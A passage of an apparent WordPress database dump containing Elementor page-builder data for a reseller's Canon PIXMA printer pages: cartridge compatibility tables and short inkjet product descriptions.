(Photo Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP988<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-821 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-820 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP996<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-821 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-820 (Pigment Black)<\\/p><\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9d0130d\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"fc01984\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6549880\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\"><tbody><tr><td width=\\\"170\\\"><p><strong>Model<\\/strong><\\/p><\\/td><td width=\\\"208\\\"><p><strong>Cartridge \\/ Bottle<\\/strong><\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MX308<\\/p><\\/td><td width=\\\"208\\\"><p>CL-41 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-831 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40\\/CL-41 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-830 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MX328<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MX338<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MX347<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MX366<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MX426<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MX876<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-821 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-820 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MX886<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-726 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-726 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-726 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-726 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-725 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA PRO-1<\\/p><\\/td><td width=\\\"208\\\"><p>PGI-29 (Chroma Optimizer)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Dark Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Light Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Matte Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Photo Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Photo Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Photo Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Red)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Yellow)<\\/p><\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b7fc065\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"387b65d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\"><tbody><tr><td width=\\\"170\\\"><p><strong>Model<\\/strong><\\/p><\\/td><td width=\\\"208\\\"><p><strong>Cartridge \\/ Bottle<\\/strong><\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA PRO-10<\\/p><\\/td><td width=\\\"208\\\"><p>PGI-72 (Chroma Optimizer)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Matte Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Photo Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Photo Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Photo Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Red)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA PRO-100<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-42 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-42 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-42 (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-42 (Light Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-42 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-42 (Photo Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-42 (Photo Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-42 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TR8570<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-781 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TS207<\\/p><\\/td><td width=\\\"208\\\"><p>CL-746 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-746S (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-746XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745S (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TS307<\\/p><\\/td><td width=\\\"208\\\"><p>CL-746 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-746S (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-746XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745S (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TS5070<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-771 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-771 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-771 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-771 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-771XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-771XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-771XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-771XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-770 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-770XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TS5170<\\/p><\\/td><td width=\\\"208\\\"><p>CL-741 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-741XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-740 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-740\\/CL-741 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-740XL (Pigment Black)<\\/p><\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"736141f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9e8521a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\"><tbody><tr><td width=\\\"170\\\"><p><strong>Model<\\/strong><\\/p><\\/td><td width=\\\"208\\\"><p><strong>Cartridge \\/ Bottle<\\/strong><\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TS8270<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-781 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Photo Blue)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Photo Blue)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TS9170<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-781 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Photo Blue)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Photo Blue)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TS9570<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-781 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780XL (Pigment Black)<\\/p><\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(6903,3299,'_elementor_version','2.5.14'),(6907,3300,'_wp_page_template','template-fullwidth.php'),(6908,3300,'_elementor_edit_mode','builder'),(6909,3300,'_elementor_template_type','post'),(6910,3300,'_elementor_data','[{\"id\":\"9ac79cf\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"2a109eb\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9d59285\",\"elType\":\"widget\",\"settings\":{\"title\":\"Injet Printers :-\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ca9ead8\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"9a9d292\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"align\":\"center\"},\"elements\":[{\"id\":\"6ad8678\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA E560 \\/ E560R\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"e70128a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/e2f221acba7b4ca795be93654fafca7b_PIXMAE560_2.png\",\"id\":2345}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"509ac9b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Advanced Wireless All-In-One with Auto Duplex\\u00a0Printing for Low-Cost Printing<\\/p><p>The Ink Efficient E560 \\/ E560R is designed to give you an affordable wireless printing experience at low running cost of up to 800 pages.<\\/p><p>Available in Black and Red.<\\/p><p>Print, Scan, Copy<\\/p><p>ISO Standard print speed (A4): up to 9.9ipm black \\/ 5.7ipm colour<\\/p><p>Hi-speed USB 2.0, WiFi<\\/p><p>Recommended print volume: 80 - 400 pages<\\/p><center>[maxbutton id=\\\"11\\\" ]<\\/center>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"19ec1cd\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"d3a1ece\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA E4270\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"47167d7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/d6c6807e1827411dade7426d7b93df91_E42XX_AS_FR_op3_blk_en-v1.png\",\"id\":2346}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"c56690e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Compact Wireless All-In-One with Fax and automatic 2-sided printing for Low-Cost Printing<\\/p><p>This compact Office All-In-One features a 20-sheet Auto Document Feeder for productivity and delivers up to 400 pages yield with high-capacity ink cartridges.<\\/p><p>Print, Scan, Copy, Fax<\\/p><p>ISO standard print speed (A4): 8.8ipm black \\/ 4.4ipm colour<\\/p><p>Hi-speed USB 2.0, WiFi, Mopria, AirPrint, Wireless Direct<\\/p><p>Recommended print volume: 50 - 200 pages<\\/p><center><span style=\\\"font-size: 0.875rem;\\\">[maxbutton id=\\\"11\\\" ]<\\/span><\\/center><p>\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"692b43d\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"a99e262\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA TS9570\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6a04479\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/099574dcdd504b0cbb4abac1a221c06e_TS95XX_AS_FR_cl_blk_en-v3.3.png\",\"id\":2347}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"6ab42ff\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>A3 Wireless Photo Printer with Large 4.3\\u201d Touch-Screen and Auto Document Feeder<\\/p><p>This A3 wireless compact Photo All-In-One printer combines amazing compactness and a wide range of printing options for the complete home and small office printing experience.<\\/p><p>Print, Scan, Copy<\\/p><p>ISO standard print speed (A4): up to 15.0ipm black \\/ 10.0ipm colour<\\/p><p>Hi-speed USB 2.0, WiFi, wired LAN, memory card slot, wireless\\/wired LAN PictBridge, Mopria, AirPrint, BLE, 